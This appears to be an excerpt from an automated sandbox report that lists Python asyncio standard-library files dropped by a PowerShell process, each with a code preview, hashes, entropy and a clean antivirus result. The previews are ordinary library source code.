                              Preview:import functools..import inspect..import reprlib..import sys..import traceback....from . import constants......def _get_function_source(func):.. func = inspect.unwrap(func).. if inspect.isfunction(func):.. code = func.__code__.. return (code.co_filename, code.co_firstlineno).. if isinstance(func, functools.partial):.. return _get_function_source(func.func).. if isinstance(func, functools.partialmethod):.. return _get_function_source(func.func).. return None......def _format_callback_source(func, args):.. func_repr = _format_callback(func, args, None).. source = _get_function_source(func).. if source:.. func_repr += f' at {source[0]}:{source[1]}'.. return func_repr......def _format_args_and_kwargs(args, kwargs):.. """Format function arguments and keyword arguments..... Special case for a single parameter: ('hello',) is formatted as ('hello')... """.. # use reprlib to limit the length of the output.. items = [].
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):14638
                              Entropy (8bit):4.473219187208677
                              Encrypted:false
                              SSDEEP:192:RH8T77Dm/ndJtDT7umUctWcOXOK4Uf6YRFTR/iNxzLdefQ9c0l+:Fwa/ndJtxZtWcy4k5E/g2Do
                              MD5:8AB6FC3745541B13A1CA4C6A733D8053
                              SHA1:7CF86F99C9D0EDFC09CE027CBEFE6A316B077FB2
                              SHA-256:793329A7A9BF2520F980C064F4E19E27928D112A8534B8094C5C4BF7DDEC97E7
                              SHA-512:4BB342E641C8B083C725FA90B5009809AEBBDB743F9495FAAC7BB97C7ABBED8AE645885E0198A6CE8EA402BC720EEDAD2628E846E946728162562E18EF299437
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""A Future class similar to the one in PEP 3148."""....__all__ = (.. 'Future', 'wrap_future', 'isfuture',..)....import concurrent.futures..import contextvars..import logging..import sys..from types import GenericAlias....from . import base_futures..from . import events..from . import exceptions..from . import format_helpers......isfuture = base_futures.isfuture......_PENDING = base_futures._PENDING.._CANCELLED = base_futures._CANCELLED.._FINISHED = base_futures._FINISHED......STACK_DEBUG = logging.DEBUG - 1 # heavy-duty debugging......class Future:.. """This class is *almost* compatible with concurrent.futures.Future..... Differences:.... - This class is not thread-safe..... - result() and exception() do not take a timeout argument and.. raise an exception when the future isn't done yet..... - Callbacks registered with add_done_callback() are always called.. via the event loop's call_soon()..... - This class is not compatible with the wait() and as_comp
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):19580
                              Entropy (8bit):4.3769687674436195
                              Encrypted:false
                              SSDEEP:192:j89mYtua1IhkzLJInU/iI7xyV+Wea/k7mt4YeJV8PxbLosoqL/Nl/1BbW5ZxZHZn:j892ViBVIoui5b2sC/my+nJvlWJEjgi
                              MD5:4B4F06D1A131B50F581E752F09394C20
                              SHA1:733455667ED37D57E4FAE0293416EE51655978A2
                              SHA-256:8676F43DC76B49D66DC63B907DD2367E7B35FE5E7CE775F816EE306B70521812
                              SHA-512:73BB39573E6E36B166597B08CFF9B39E70B8024C8303A5E89D8C238C394DACE5621F869F25CB2D368023CE2E382A29B615F98E55B328B85E8C073FB9949F4F0B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Synchronization primitives."""....__all__ = ('Lock', 'Event', 'Condition', 'Semaphore',.. 'BoundedSemaphore', 'Barrier')....import collections..import enum....from . import exceptions..from . import mixins....class _ContextManagerMixin:.. async def __aenter__(self):.. await self.acquire().. # We have no use for the "as ..." clause in the with.. # statement for locks... return None.... async def __aexit__(self, exc_type, exc, tb):.. self.release()......class Lock(_ContextManagerMixin, mixins._LoopBoundMixin):.. """Primitive lock objects..... A primitive lock is a synchronization primitive that is not owned.. by a particular coroutine when locked. A primitive lock is in one.. of two states, 'locked' or 'unlocked'..... It is created in the unlocked state. It has two basic methods,.. acquire() and release(). When the state is unlocked, acquire().. changes the state to locked and returns immediately. When the..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):131
                              Entropy (8bit):4.37276371888401
                              Encrypted:false
                              SSDEEP:3:W5DQIMeHnoHIgXAgCrovYSNAFWAX+k++SoRKt1zC2QK466AGB:8QIbnoHXe+bPAukNSoRKtQW6Au
                              MD5:07687A8E3B30B3B320A3B3164812E3B1
                              SHA1:04A117C1275B17E12EC9527F49CA74399F9FFB28
                              SHA-256:72433D0D5A4205B74EF4FF95CD3E1C8D98960A58371E5546698A3A38F231058C
                              SHA-512:E2C8DE755A6281245B0A25BA20F4956EBDBB83AD375DEC62A93310C7D5F1BF12B10A7467807272B7323EB5D0C9CF3771421100B588A78945EEB972D768ED52FA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Logging configuration."""....import logging......# Name the logger after the package...logger = logging.getLogger(__package__)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):502
                              Entropy (8bit):4.264038214993239
                              Encrypted:false
                              SSDEEP:6:2Ajxj4XvQtLTFL6Niuh2AakLv1G/HtpNDeidJKwQMTJy9MBXcAKKPksQBd8clRYR:20t1eh0DqvkX9KRfuPLDclRYR
                              MD5:592AD5057035FBE84AF5222A68FD2D7E
                              SHA1:C7FCBB8D67F25C9B9C46639EC1D0B78A2DE8B102
                              SHA-256:F5055BBC8622C99F91EF58024D4655209C904AB43F11498ADFB6218C127F9946
                              SHA-512:341D4C1B301632B51DD0F8B10F298745FC75994ABCC8C75F962C96BC155A4302A60F79998FDF2F927705E3EA060FEA6686151DF9094CC72025D5A4D2692A3599
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Event loop mixins."""....import threading..from . import events...._global_lock = threading.Lock()......class _LoopBoundMixin:.. _loop = None.... def _get_loop(self):.. loop = events._get_running_loop().... if self._loop is None:.. with _global_lock:.. if self._loop is None:.. self._loop = loop.. if loop is not self._loop:.. raise RuntimeError(f'{self!r} is bound to a different event loop').. return loop..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):34280
                              Entropy (8bit):4.238022486766239
                              Encrypted:false
                              SSDEEP:768:H4dU5QRJLvasHDpbMaZrfo2T/qnmaT3sqHBBtKyR:Yi5kNppNfo8aT3sI1R
                              MD5:19CDC88E6AC4FFD34F96EDAF4439F2CD
                              SHA1:F443203F24A36ECE66837FDC46BD876E43CEA39C
                              SHA-256:6BC9F7FB8664D7E20F2C56241B52CC2B0B358AE207D22E5AFFCC10AB333A3F65
                              SHA-512:00F13DC2F6FDC413CCB33D33CF1A1493B5165421BED7E46BC02C960920A98576F6905E227D8069EFC52679D07086AEA1B74F6138FFA9930777A77468D40D8884
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Event loop using a proactor and related classes.....A proactor is a "notify-on-completion" multiplexer. Currently a..proactor is only implemented on Windows with IOCP..."""....__all__ = 'BaseProactorEventLoop',....import io..import os..import socket..import warnings..import signal..import threading..import collections....from . import base_events..from . import constants..from . import futures..from . import exceptions..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _set_socket_extra(transport, sock):.. transport._extra['socket'] = trsock.TransportSocket(sock).... try:.. transport._extra['sockname'] = sock.getsockname().. except socket.error:.. if transport._loop.get_debug():.. logger.warning(.. "getsockname() failed on %r", sock, exc_info=True).... if 'peername' not in transport._extra:.. try:.. transport._extra['peername'] = sock
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7173
                              Entropy (8bit):4.508690129802189
                              Encrypted:false
                              SSDEEP:96:GvIrPBEBCe7pXv83jwbtB2S1KnUB/MB2E505cFj:GvsqNVETwmSwU5hE5Z
                              MD5:AA57F822D953D524C717845CF040C7A8
                              SHA1:4A044088F18490FD5E29F132BA5EC1224C723BB9
                              SHA-256:66038B46A3D99B358166A061B9D5E9486CDDB9626D84C34F343640BB0D0EEC0A
                              SHA-512:A3FB50B69AA2523C17AE04B7562B42EBE2FB5F9EA5B23403EE9D92059C7B23727F30867FA561EC7E165D21B77C6F84F0024972D7335ADB09245198935985234B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Abstract Protocol base classes."""....__all__ = (.. 'BaseProtocol', 'Protocol', 'DatagramProtocol',.. 'SubprocessProtocol', 'BufferedProtocol',..)......class BaseProtocol:.. """Common base class for protocol interfaces..... Usually user implements protocols that derived from BaseProtocol.. like Protocol or ProcessProtocol..... The only case when BaseProtocol should be implemented directly is.. write-only transport like write pipe.. """.... __slots__ = ().... def connection_made(self, transport):.. """Called when a connection is made..... The argument is the transport representing the pipe connection... To receive data, wait for data_received() calls... When the connection is closed, connection_lost() is called... """.... def connection_lost(self, exc):.. """Called when the connection is lost or closed..... The argument is an exception object or None (the latter.. meaning a regular EOF is receive
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8218
                              Entropy (8bit):4.355264320169499
                              Encrypted:false
                              SSDEEP:96:ZihNcb/YAsKXSWefpst8gcyTD6NKN2q2p9As/g2pbq8UXZbFLLBk3:ucbQfKX/6pXOXe+AL2ZJs
                              MD5:AA07F295C880EFCF11114F912DA15556
                              SHA1:15684100DC5BD09ED682FD4DD3F16FAB106F1500
                              SHA-256:77EA57D6C140F46FF1740FE0948894E43A77D6CFD3F03720DBDC7F5B72F03127
                              SHA-512:621441FAFE32F5C10461734286BA330FAD6A65473CE8CCC90080491EEB186DA99D28FDA8F48361A241388FFE061B0E545F8E8A32742295582A30FCDF97264348
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:__all__ = ('Queue', 'PriorityQueue', 'LifoQueue', 'QueueFull', 'QueueEmpty')....import collections..import heapq..from types import GenericAlias....from . import locks..from . import mixins......class QueueEmpty(Exception):.. """Raised when Queue.get_nowait() is called on an empty Queue.""".. pass......class QueueFull(Exception):.. """Raised when the Queue.put_nowait() method is called on a full Queue.""".. pass......class Queue(mixins._LoopBoundMixin):.. """A queue, useful for coordinating producer and consumer coroutines..... If maxsize is less than or equal to zero, the queue size is infinite. If it.. is an integer greater than 0, then "await put()" will block when the.. queue reaches maxsize, until an item is removed by get()..... Unlike the standard library Queue, you can reliably know this Queue's size.. with qsize(), since your single-threaded asyncio application won't be.. interrupted between calling qsize() and doing an operation on the Queue..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7374
                              Entropy (8bit):4.447281372761197
                              Encrypted:false
                              SSDEEP:192:W9Qus+1IZ8S3+eA1NHFh8p9w+p/Hya4ALzTaIhqN:qqOIZa7lKaCZzTI
                              MD5:53F58587D7AD16443DA53C0D7F45629C
                              SHA1:EE635CEEB130CF537D1C0EDDAF40F5BFC15DD234
                              SHA-256:ED1A56F37A46004F6BBB4FE597EEA239EA33911EF0C1505903A65F0F30ADE110
                              SHA-512:93812F5CB92E046313989DA87D718A0B60D586E8E2A73663BE7D9BCA0B438DA26A6581E80CD07EBB4C9B90BD8CC1A7302B700DD7428CB783D811C295761E2150
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:__all__ = ('Runner', 'run')....import contextvars..import enum..import functools..import threading..import signal..from . import coroutines..from . import events..from . import exceptions..from . import tasks..from . import constants....class _State(enum.Enum):.. CREATED = "created".. INITIALIZED = "initialized".. CLOSED = "closed"......class Runner:.. """A context manager that controls event loop life cycle..... The context manager always creates a new event loop,.. allows to run async functions inside it,.. and properly finalizes the loop at the context manager exit..... If debug is True, the event loop will be run in debug mode... If loop_factory is passed, it is used for new event loop creation..... asyncio.run(main(), debug=True).... is a shortcut for.... with asyncio.Runner(debug=True) as runner:.. runner.run(main()).... The run() method can be called multiple times within the runner's context..... This can be useful for interactiv
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):49562
                              Entropy (8bit):4.295782081297384
                              Encrypted:false
                              SSDEEP:768:QSXM1ILQh35d/lG+YKFjq/R4NtL1xEY8A3szehU70O+2:QS0CU5rNYQq
                              MD5:CD29D4B9E2D7DDCD5F5147B7FD297298
                              SHA1:2341A3DD3A199CC57F0D1993616EC1D675B2DE5B
                              SHA-256:65AA8EE7E00C9AF60158A1059C01F36B028D133BF8DDC5E2E55CDCCB76A9ED86
                              SHA-512:775FE3736B3960DBA2E435765EEAD3A8BB72B670086F6B6E056528006913021BC69C800FCCA793673BF1C30BDA614E2ACD872E07C1633515000C0FBE7B8CD985
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Event loop using a selector and related classes.....A selector is a "notify-when-ready" multiplexer. For a subclass which..also includes support for signal handling, see the unix_events sub-module..."""....__all__ = 'BaseSelectorEventLoop',....import collections..import errno..import functools..import itertools..import os..import selectors..import socket..import warnings..import weakref..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import base_events..from . import constants..from . import events..from . import futures..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger...._HAS_SENDMSG = hasattr(socket.socket, 'sendmsg')....if _HAS_SENDMSG:.. try:.. SC_IOV_MAX = os.sysconf('SC_IOV_MAX').. except OSError:.. # Fallback to send.. _HAS_SENDMSG = False....def _test_selector_event(selector, fd, event):.. # Test if the selector is monitoring 'event
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):32665
                              Entropy (8bit):4.448464309868453
                              Encrypted:false
                              SSDEEP:192:ab9lsu9k/6CTlE/B/AgUYi00Q1UT/AuJBhzX+Shn04o/dCMcc02F/8NNdbpap/7k:ahTf1cZ0VxoIz1jp0TxuKCVmsxg
                              MD5:B0372CDBEE5EEA08A89E28C414102648
                              SHA1:5A43369B6A50E9D377402C0484F8C3553E32FBD7
                              SHA-256:C5C2475B3CF78EC6CC7538C7125B6704AE17EAD509E368CB500E4BA80EA5A6AF
                              SHA-512:47AA88FED8C63651E3953E10726DEEAF328CCA668C37A9A77CAB3307941CAF68134E913BB90DE8079093F33EEAA178AF929DD8213E1CA2327E411045D3E99AF8
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:# Contains code from https://github.com/MagicStack/uvloop/tree/v0.16.0..# SPDX-License-Identifier: PSF-2.0 AND (MIT OR Apache-2.0)..# SPDX-FileCopyrightText: Copyright (c) 2015-2021 MagicStack Inc. http://magic.io....import collections..import enum..import warnings..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import constants..from . import exceptions..from . import protocols..from . import transports..from .log import logger....if ssl is not None:.. SSLAgainErrors = (ssl.SSLWantReadError, ssl.SSLSyscallError)......class SSLProtocolState(enum.Enum):.. UNWRAPPED = "UNWRAPPED".. DO_HANDSHAKE = "DO_HANDSHAKE".. WRAPPED = "WRAPPED".. FLUSHING = "FLUSHING".. SHUTDOWN = "SHUTDOWN"......class AppProtocolState(enum.Enum):.. # This tracks the state of app protocol (https://git.io/fj59P):.. #.. # INIT -cm-> CON_MADE [-dr*->] [-er-> EOF?] -cl-> CON_LOST.. #.. # * cm: connection_made().. # * dr: data_received()..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6141
                              Entropy (8bit):4.389643633306416
                              Encrypted:false
                              SSDEEP:96:r/40VDFh1NO3QFFBUQJxAHsI/5QGG/1a4bN4u8MGomMMhetgqldcEtHCF3hUkwTB:dV1BEBQjaQWKtldcEyxUkwt
                              MD5:BCA378D3DB917FB79E03181E278C23AD
                              SHA1:EF2CD76DD08000173CA5EDA494DB4F728066BBDC
                              SHA-256:18785BF43A6B21A235DA704A60CAF28232F6E57C56E3EB81D01BB50C5B9D4858
                              SHA-512:CCB0F5C3EB272A4404E467FB5789A7D32D686794530BFAD1A07FFA934D9B497368ABC5569BB97D0BB323BB78A8E74CC413768CB6D8619FCE3E8D2A49FB695008
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Support for running coroutines in parallel with staggered start times."""....__all__ = 'staggered_race',....import contextlib..import typing....from . import events..from . import exceptions as exceptions_mod..from . import locks..from . import tasks......async def staggered_race(.. coro_fns: typing.Iterable[typing.Callable[[], typing.Awaitable]],.. delay: typing.Optional[float],.. *,.. loop: events.AbstractEventLoop = None,..) -> typing.Tuple[.. typing.Any,.. typing.Optional[int],.. typing.List[typing.Optional[Exception]]..]:.. """Run coroutines with staggered start times and take the first to finish..... This method takes an iterable of coroutine functions. The first one is.. started immediately. From then on, whenever the immediately preceding one.. fails (raises an exception), or when *delay* seconds has passed, the next.. coroutine is started. This continues until one of the coroutines complete.. successfully, in which case
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):28389
                              Entropy (8bit):4.334298379691788
                              Encrypted:false
                              SSDEEP:384:xqOmlvrbxYaOmA8nZ7u3EVo//iUhu0UDYCHkJhqhXWFNTicMO:xq11bmaOTkZc/PhvJhyXkTiPO
                              MD5:CF4E6B898027D807CB3864EDC840A469
                              SHA1:37BC27CF5FA1E86A4C82E9497959E5772F6D6131
                              SHA-256:1BC43CFFAD3DC2422811017788BCF394AE4269D4C6EB66295FDBCA580015C482
                              SHA-512:4EBE2D6D6C9A773D6CAAE703D6E24B8C30ED31CA977919A69E8722EB177EC30BDAD08AE7A4CA44D5EBFD89272B030D9D9E3568465BA6683E605D7CA4254471A2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:__all__ = (.. 'StreamReader', 'StreamWriter', 'StreamReaderProtocol',.. 'open_connection', 'start_server')....import collections..import socket..import sys..import warnings..import weakref....if hasattr(socket, 'AF_UNIX'):.. __all__ += ('open_unix_connection', 'start_unix_server')....from . import coroutines..from . import events..from . import exceptions..from . import format_helpers..from . import protocols..from .log import logger..from .tasks import sleep......_DEFAULT_LIMIT = 2 ** 16 # 64 KiB......async def open_connection(host=None, port=None, *,.. limit=_DEFAULT_LIMIT, **kwds):.. """A wrapper for create_connection() returning a (reader, writer) pair..... The reader returned is a StreamReader instance; the writer is a.. StreamWriter instance..... The arguments are all the usual arguments to create_connection().. except protocol_factory; most common are positional host and port,.. with various optional keyword arguments followin
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7966
                              Entropy (8bit):4.220981877085878
                              Encrypted:false
                              SSDEEP:96:K4sU1b4rU9oQesQ+rshTe2ihT/xPNGMcfOyWqnUCqHS0Nym0NQo+3LtgL63LGgLv:x6J3OT/Ls/W/y9mBoa5yOCyv
                              MD5:D274512CF8A00C6ADB71CB250612EBF4
                              SHA1:D094C446255D1DD1F36CD8DC8EE0102236C5ED05
                              SHA-256:2C7A0E549992A9731EFCF3F1A06FBF734DB90B54D9734D2708953B722BBD533C
                              SHA-512:E6359D4D158C8006CE0128FC9BA17CD8F6B53F9B84FAF6B70909C3A246559C6E2EE7796711238D38642486F55CE246179D705DCBCD3F0BABB759D58D0EFC68DF
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:__all__ = 'create_subprocess_exec', 'create_subprocess_shell'....import subprocess....from . import events..from . import protocols..from . import streams..from . import tasks..from .log import logger......PIPE = subprocess.PIPE..STDOUT = subprocess.STDOUT..DEVNULL = subprocess.DEVNULL......class SubprocessStreamProtocol(streams.FlowControlMixin,.. protocols.SubprocessProtocol):.. """Like StreamReaderProtocol, but for a subprocess.""".... def __init__(self, limit, loop):.. super().__init__(loop=loop).. self._limit = limit.. self.stdin = self.stdout = self.stderr = None.. self._transport = None.. self._process_exited = False.. self._pipe_fds = [].. self._stdin_closed = self._loop.create_future().... def __repr__(self):.. info = [self.__class__.__name__].. if self.stdin is not None:.. info.append(f'stdin={self.stdin!r}').. if self.stdout is not None:.. info.a
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8987
                              Entropy (8bit):4.141311182208331
                              Encrypted:false
                              SSDEEP:96:o4H+PTnEW4g5VseACDe2BeBstz7B18xEcUDJyxu9rUQfqeWLeh/e:8fzjACCetpO5UR9rUQSo/e
                              MD5:DCC71CF7370642651F465B65EB1A2A52
                              SHA1:AC3A1B0F3E66BD97F51AAB71D6331DCEC33552E2
                              SHA-256:2EBD3A292448AB0058FD7558A63D578B3156CC53DDDFB8755A700EEE9EAAE354
                              SHA-512:7E11F577BAC258F1F26395AF4C48F31982C898DE120FB659F64AB202408B3964EEEA6E8A795DB62520BDBBFF0BF5A5F6AA307F6181FB9625EBA6EA545A332B7B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:# Adapted with permission from the EdgeDB project;..# license: PSFL.......__all__ = ("TaskGroup",)....from . import events..from . import exceptions..from . import tasks......class TaskGroup:.. """Asynchronous context manager for managing groups of tasks..... Example use:.... async with asyncio.TaskGroup() as group:.. task1 = group.create_task(some_coroutine(...)).. task2 = group.create_task(other_coroutine(...)).. print("Both tasks have completed now.").... All tasks are awaited when the context manager exits..... Any exceptions other than `asyncio.CancelledError` raised within.. a task will cancel all remaining tasks and wait for them to exit... The exceptions are then combined and raised as an `ExceptionGroup`... """.. def __init__(self):.. self._entered = False.. self._exiting = False.. self._aborting = False.. self._loop = None.. self._parent_task = None.. self._parent_cancel_requ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):38427
                              Entropy (8bit):4.4020695030500026
                              Encrypted:false
                              SSDEEP:768:clsnnwmXK1AfPsj71FefeTMmYrKKPdIwwfxhR77K45CwdTf:Usn/OpxhR7735Cwp
                              MD5:A77DD97821E0B50965BD586573560F15
                              SHA1:E9EAAB6FD4AB465A9EFA6655A442FD61AC835D9F
                              SHA-256:C9501733827182D5EAB6638EF7117367C5FE5DB0191E45BF96F9FAA463127E83
                              SHA-512:6AF278ADA32497AC826F6A80C29379870462F85F05CE413E151C356C6940511A4E4899F94BED0DFC988C2F25C38D10C6A1CFAECAF1C7A79592EA537BD18D8DFD
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Support for tasks, coroutines and the scheduler."""....__all__ = (.. 'Task', 'create_task',.. 'FIRST_COMPLETED', 'FIRST_EXCEPTION', 'ALL_COMPLETED',.. 'wait', 'wait_for', 'as_completed', 'sleep',.. 'gather', 'shield', 'ensure_future', 'run_coroutine_threadsafe',.. 'current_task', 'all_tasks',.. 'create_eager_task_factory', 'eager_task_factory',.. '_register_task', '_unregister_task', '_enter_task', '_leave_task',..)....import concurrent.futures..import contextvars..import functools..import inspect..import itertools..import types..import warnings..import weakref..from types import GenericAlias....from . import base_tasks..from . import coroutines..from . import events..from . import exceptions..from . import futures..from . import timeouts....# Helper to generate new task names..# This uses itertools.count() instead of a "+= 1" operation because the latter..# is not thread safe. See bpo-11866 for a longer explanation..._task_name_counter = itertools.count(1).__ne
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):815
                              Entropy (8bit):4.657768265178285
                              Encrypted:false
                              SSDEEP:24:gpnQoNsLJHhQITtNaCiXm9PjkqjYcKTm3I3CGxu:gpnQoNwN7aFW9hj3CmYyG0
                              MD5:0EBB52B3B39916EDEE1B1CE2805F0D5E
                              SHA1:11600DD141A2A22C00F5A7E0A43F5916778E53AA
                              SHA-256:60310C6E008F10C117388BA34811250134DC6FE4577031CDA37E8F9ADEA40920
                              SHA-512:E8DF889521C85F7B2A3AB5DD21F3B3B87B3A254B289D7E80B9256A73B0204D19149FC92E5433CCFD3201223D03CEDAA45F56C8E9FD58E51FCAA0820079604188
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""High-level support for working with threads in asyncio"""....import functools..import contextvars....from . import events......__all__ = "to_thread",......async def to_thread(func, /, *args, **kwargs):.. """Asynchronously run function *func* in a separate thread..... Any *args and **kwargs supplied for this function are directly passed.. to *func*. Also, the current :class:`contextvars.Context` is propagated,.. allowing context variables from the main thread to be accessed in the.. separate thread..... Return a coroutine that can be awaited to get the eventual result of *func*... """.. loop = events.get_running_loop().. ctx = contextvars.copy_context().. func_call = functools.partial(ctx.run, func, *args, **kwargs).. return await loop.run_in_executor(None, func_call)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5489
                              Entropy (8bit):4.611632288524656
                              Encrypted:false
                              SSDEEP:96:FudZ4HtaQ70BqYE3+7Kd3wXBoaA3xEXcpuGtmn3l4yN0wsB2yPqc7n:RHf+7Kd3wXnA3mX2uGtmn3lSPPn
                              MD5:7CE2EEC51B5A7D39673EECF93A57BD61
                              SHA1:F5C4202317FDF7F6FE08B51382FEB9F11DD49C92
                              SHA-256:0BEB692F463BB3C55382B32B4174E31C546B33257C14172C34DB1AD1DD269FF8
                              SHA-512:4CABCD2DF65A45943920BC242EBD720E264A3F4427476B869713872E124C25D82889AFF82570B2AF3D45D26E90F03F83AA1EDC142853BF410474DB7DB32D73F4
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:import enum....from types import TracebackType..from typing import final, Optional, Type....from . import events..from . import exceptions..from . import tasks......__all__ = (.. "Timeout",.. "timeout",.. "timeout_at",..)......class _State(enum.Enum):.. CREATED = "created".. ENTERED = "active".. EXPIRING = "expiring".. EXPIRED = "expired".. EXITED = "finished"......@final..class Timeout:.. """Asynchronous context manager for cancelling overdue coroutines..... Use `timeout()` or `timeout_at()` rather than instantiating this class directly... """.... def __init__(self, when: Optional[float]) -> None:.. """Schedule a timeout that will trigger at a given loop time..... - If `when` is `None`, the timeout will never trigger... - If `when < loop.time()`, the timeout will trigger on the next.. iteration of the event loop... """.. self._state = _State.CREATED.... self._timeout_handler: Optional[events.TimerHa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11057
                              Entropy (8bit):4.483143343037431
                              Encrypted:false
                              SSDEEP:96:9OHQeRHshZCLgUWipf9ImE13ACrCN7ZMNUDlM1kw0dgmw/vuKwAHdtEZF/S19VdK:936TgUfSTUS0dKHqF/SD/3r9ZG
                              MD5:786D77690A797492513E944D3B0A3738
                              SHA1:558FA6A0BF0B155036F2664CEBB3A61ABB0F833F
                              SHA-256:9C1DAEFB52B4EDD948ACB7F6B202EB3E7D72DCB0706CC035076C9F6A13AC529B
                              SHA-512:20A6B43D4F39DA10D9ED9B717834CF62C8015DA52C64DB287C37F8BB209EED652E7BB159917A304695E51535F3419FA0DF362B8E2D1AF6C878C7938D87646516
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Abstract Transport class."""....__all__ = (.. 'BaseTransport', 'ReadTransport', 'WriteTransport',.. 'Transport', 'DatagramTransport', 'SubprocessTransport',..)......class BaseTransport:.. """Base class for transports.""".... __slots__ = ('_extra',).... def __init__(self, extra=None):.. if extra is None:.. extra = {}.. self._extra = extra.... def get_extra_info(self, name, default=None):.. """Get optional transport information.""".. return self._extra.get(name, default).... def is_closing(self):.. """Return True if the transport is closing or closed.""".. raise NotImplementedError.... def close(self):.. """Close the transport..... Buffered data will be flushed asynchronously. No more data.. will be received. After all buffered data is flushed, the.. protocol's connection_lost() method will (eventually) be.. called with None as its argument... """.. raise Not
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2573
                              Entropy (8bit):4.380578135626314
                              Encrypted:false
                              SSDEEP:48:+oSYj9/IgdHlz6M6duFruaHo+89gcR8fxaMU:15/Igxl+AyqoR8Y
                              MD5:98440E7E64C21EFB53A1F1A1EF96DD09
                              SHA1:9885A51DFE12C79E994310501D8142687967FC5A
                              SHA-256:CE72DE2AFC811493E169B486E60E510FDB99F9170E01F06A9A8EC720D7E75038
                              SHA-512:BE69E207A9F50CB66F42180E4207A34469D14F6D8951FF7BA73B272B0EF9CE95F1BBB0D277D8B1ACB9E70B069B2BC5C724A0BD46324FC1AFC1B9AF18F2FE03F4
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
